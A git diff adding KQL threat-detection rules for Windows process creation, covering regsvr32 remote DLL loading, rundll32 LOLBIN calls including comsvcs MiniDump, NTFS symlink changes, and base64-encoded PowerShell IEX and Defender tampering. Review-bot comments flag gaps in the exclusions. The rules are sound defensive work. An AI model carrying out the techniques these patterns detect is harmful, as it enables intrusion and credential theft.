+| where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
new file mode 100644
index 00000000..d320293e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious NTFS Symlink Behavior Modification
+// Author: frack113, The DFIR Report
+// Date: 2022-03-02
+// Level: medium
+// Description: Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1222.001
+// False Positives:
+// - Legitimate usage, investigate the parent process and context to determine if benign.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "fsutil" and ProcessCommandLine contains "behavior" and ProcessCommandLine contains "set" and ProcessCommandLine contains "SymlinkEvaluation") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "R2L:1" or ProcessCommandLine contains "R2R:1" or ProcessCommandLine contains "L2L:1")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
new file mode 100644
index 00000000..d224b552
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_office_document_executed_from_trusted_location.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Office Document Executed From Trusted Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql
new file mode 100644
index 00000000..4d5eb074
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_ping_copy_command_combination.kql
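Review bot: The template-extension exclusion `not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx"))` only applies when the document path is the very last thing on the command line; if the path is quoted, the command line ends with `"` instead and every legitimate template open from the trusted folders raises a high-severity alert. Whether the recorded command lines carry that trailing quote depends on how the Office shell handler launches the process, which this hunk does not show, so it should be confirmed on real telemetry before tuning. A more tolerant form is to add `or ProcessCommandLine endswith ".dotx\""` per extension, or a single `ProcessCommandLine matches regex @'(?i)\.(dotx|xltx|potx)"?$'` (constructed; the `(?i)` is needed because `matches regex` is case-sensitive where `endswith` is not). Since the file is converter output, the fix most likely belongs in the upstream rule or the conversion rather than a hand edit here.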
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Ping/Copy Command Combination
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-18
+// Level: medium
+// Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ping" and ProcessCommandLine contains "copy ") and (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql
new file mode 100644
index 00000000..5258a128
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ftp_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-05-24
+// Level: medium
+// Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /i" or ProcessCommandLine contains " -i") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains "ftp" or ProcessCommandLine contains "http")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql
new file mode 100644
index 00000000..a75a5257
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_regsvr32_http_ip_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Regsvr32 HTTP IP Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - FQDNs that start with a number such as "7-Zip"
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql
new file mode 100644
index 00000000..204a73e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Rundll32 Activity
+// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
new file mode 100644
index 00000000..7eff346b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
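Review bot: The control-panel exclusion in the `not(...)` branch pins the system drive in `InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"` and in the `startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL ..."` prefix, while the selection part of the rule matches any drive, so on a host whose system volume is not C: the legitimate control.exe to rundll32.exe `.cpl` chain would no longer be excluded. The other generated rules in this commit use drive-agnostic suffixes such as `":\\Windows\\System32\\mmc.exe"` (event-viewer hunk); `InitiatingProcessFolderPath endswith ":\\Windows\\System32\\control.exe"` would be consistent with them, and `endswith` is case-insensitive like `=~`. The same mix appears in the Windows-App hunk further down, where the selection pins `"C:\\Program Files\\WindowsApps\\"` but the Windows Terminal exclusion uses the drive-agnostic `":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"`. As these files are converter output, the change belongs in the upstream rule or the conversion rather than a hand edit here.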
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Rundll32.EXE Execution of UDL File
+// Author: @kostastsale
+// Date: 2024-08-16
+// Level: medium
+// Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
+// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071
+// False Positives:
+// - UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "oledb32.dll" and ProcessCommandLine contains ",OpenDSLFile " and (ProcessCommandLine contains "\\Users\\" and ProcessCommandLine contains "\\Downloads\\")) and ProcessCommandLine endswith ".udl") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql
new file mode 100644
index 00000000..b5f1787f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_usage_of_qemu.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Usage Of Qemu
+// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
+// Date: 2024-06-03
+// Level: medium
+// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment.
+// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090, attack.t1572
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql
new file mode 100644
index 00000000..d9e979b2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_webdav_lnk_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious WebDAV LNK Execution
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects possible execution via LNK file accessed on a WebDAV server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1204
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql
new file mode 100644
index 00000000..227154b9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_windows_app_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Windows App Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-12
+// Level: medium
+// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate packages that make use of external binaries such as Windows Terminal
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.SysinternalsSuite") or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql
new file mode 100644
index 00000000..b21d0472
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_frombase64string_cmdlet.kql
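Review bot: The selection clause `InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\"` hard-codes the drive letter, while the Windows Terminal exclusion in the same `| where` line matches `":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal"` without one (the Sysinternals exclusion keeps the `C:`), so a package store on a non-C: system drive is never selected and the exclusions are wider than the selection they carve from. If this mirrors the Sigma source, a `// NOTE: parent path is matched on drive C: only` line under False Positives would save the next reader from re-deriving it; otherwise dropping the letter to `":\\Program Files\\WindowsApps\\"` makes the selection and the exclusions consistent.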
@@ -0,0 +1,10 @@
+// Title: PowerShell Base64 Encoded FromBase64String Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-24
+// Level: high
+// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql
new file mode 100644
index 00000000..5ad68d4b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_iex_cmdlet.kql
@@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded IEX Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2019-08-23 +// Level: high +// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains 
"kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql new file mode 100644 index 00000000..447a251d --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_invoke_keyword.kql @@ -0,0 +1,10 @@ +// Title: PowerShell Base64 Encoded Invoke Keyword +// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t +// Date: 2022-05-20 +// Level: high +// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql new file mode 100644 index 00000000..a61d64da --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_mppreference_cmdlet.kql 
@@ -0,0 +1,10 @@ +// Title: Powershell Base64 Encoded MpPreference Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-04 +// Level: high +// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains 
"zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql new file mode 100644 index 00000000..6e888d3f --- /dev/null +++ b/KQL/rules/windows/process_creation/powershell_base64_encoded_reflective_assembly_load.kql 
@@ -0,0 +1,12 @@ +// Title: PowerShell Base64 Encoded Reflective Assembly Load +// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) +// Date: 2022-03-01 +// Level: high +// Description: Detects base64 encoded .NET reflective loading of Assembly +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file 
